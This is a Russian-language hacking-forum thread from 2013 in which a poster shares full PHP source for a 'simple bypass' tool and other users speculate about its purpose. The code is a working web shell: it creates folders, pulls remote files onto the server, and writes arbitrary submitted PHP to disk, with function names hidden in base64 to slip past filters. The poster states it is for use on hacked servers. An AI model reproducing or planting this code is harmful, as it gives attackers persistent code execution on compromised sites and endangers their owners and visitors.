1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Простая Обходилка

Тема в разделе "Веб-Уязвимости | Эксплуатация", создана пользователем ResH, 20 янв 2013.

  1. TopicStarter Overlay
    ResH

    ResH Команда форума

    Регистрация:
    26 июл 2012
    Сообщения:
    1.682
    Симпатии:
    2.274
    <form method="POST">
    <center>
    <title> Простая Обходилка </title>
    <p align="center"><font face="Tahoma" size="5">[+] <font color="#CC0000">Простая</font>
    Обходилка !</font></p>
    <p align="center"><font face="Tahoma" size="2">Создать папку : </font></p>
    <input type="text" name="dir" value="sec4ever">
    <input type="submit" value="Create" name="folder"> <br> <br>
    <p align="center"><font face="Tahoma" size="2">Скачать файл : </font></p>
    <input type="text" name="get" value="url file .txt">
    <input type="text" name="name" value="sec4ever.php">
    <input type="text" name="select" value="<? echo dirname(__FILE__); ?>">
    <input type="submit" value="GET" name="fileget"> <br> <br>
    <p align="center"><font face="Tahoma" size="2">Открыть файл : </font></p>
    <input type="text" name="save" value="krz.php">
    <input type="text" name="path2" value="<? echo dirname(__FILE__); ?>"><br>
    <textarea name="source" cols="45" rows="5">PHP код</textarea>
    <input type="submit" value="Save" name="fopen">
    <?
    #########################################################################
    # Домашняя страница : Please login or register to view links #
    # Благодарность : No-QRQR - n4ss1m - DR.THMOORY #
    #########################################################################
    # Create Folder
    if($_POST['folder']) {
    $mk = $_POST['dir'];
    $func = "bWtkaXI=";
    $de = base64_decode($func);
    $rules1 = $de($mk);
    if ($mk) {
    echo "<br>[+] Done [ $mk ] Created !";
    } }
    # File Get Contents
    if($_POST['fileget']) {
    $get = $_POST['get'];
    $n4m = $_POST['name'];
    $path = $_POST['select'];
    $func2 = "ZmlsZV9nZXRfY29udGVudHM=";
    $de2 = base64_decode($func2);
    $rules2 = $de2($get);
    $open = fopen("$path/$n4m", 'w');
    fwrite($open,$rules2);
    fclose($open);
    if($get) {
    echo "done";
    } }
    #
    # fopen File
    if($_POST['fopen']) {
    $save = $_POST['save'];
    $path2 = $_POST['path2'];
    $open2 = fopen("$path2/$save", 'w');
    $source1 = $_POST['source'];
    $source2 = stripslashes($source1);
    fwrite($open2 ,$source2);
    fclose($open2);
    if($open2) {
    echo "done";
    } }
    ?>
    <p align="center"><font face="Tahoma" size="2"><br>
    <p align="center"><font face="Tahoma" size="2">Внимание : </font>
    <span LANG="EN"><font SIZE="2" COLOR="#ff0000" face="Tahoma">Тулза использует file_get_contents &amp; fOpen функции </p>
    </font></span>
    <p align="center"><font face="Tahoma" size="2"><br>
    &nbsp;</font></p>
     
    Метки:
  2. NeeON

    NeeON

    Регистрация:
    24 окт 2012
    Сообщения:
    406
    Симпатии:
    386
    Обходилка чего?)
     
    • Like Like x 1
  3. adioss

    adioss

    Регистрация:
    22 авг 2012
    Сообщения:
    294
    Симпатии:
    294
    Фильтров, наверно
     
  4. Prince

    Prince

    Регистрация:
    14 май 2012
    Сообщения:
    448
    Симпатии:
    231
    А можно вопрос? Обходилка чего?
    --- добавлено: 20 янв 2013 в 14:26 ---
    Я не одинок!
     
  5. adioss

    adioss

    Регистрация:
    22 авг 2012
    Сообщения:
    294
    Симпатии:
    294
    Cкорее всего фильтров. Когда, например, ну в шк на компах закрывают доступ к vk.com и тд, то через эту обходилку заходишь на нужный сайт. Но, это догадка.
     
  6. Prince

    Prince

    Регистрация:
    14 май 2012
    Сообщения:
    448
    Симпатии:
    231
    Ну подождем хозяина и узнаем!
     
  7. adioss

    adioss

    Регистрация:
    22 авг 2012
    Сообщения:
    294
    Симпатии:
    294
    ок, подождем хозяина
    [​IMG]
     
    • Like Like x 1
  8. }{OTT@BY4

    }{OTT@BY4 Гость

    ПФФ, анонимайзеры юзать не судьба???? Если сисадмин не лох то заблочит полюбому!!
    --- добавлено: 20 янв 2013 в 16:39 ---
    Залочит не домен а ип узла и всё!!!!
     
  9. Prince

    Prince

    Регистрация:
    14 май 2012
    Сообщения:
    448
    Симпатии:
    231
    Не судьба!
     
  10. }{OTT@BY4

    }{OTT@BY4 Гость

    А что ж так религия не позволяет?????
     
    • Like Like x 2
  11. TopicStarter Overlay
    ResH

    ResH Команда форума

    Регистрация:
    26 июл 2012
    Сообщения:
    1.682
    Симпатии:
    2.274
    какой еще ВК) этот скрипт обходит на создание папок или скачивание файлов с взломанного сервера
     

Поделиться этой страницей

Загрузка...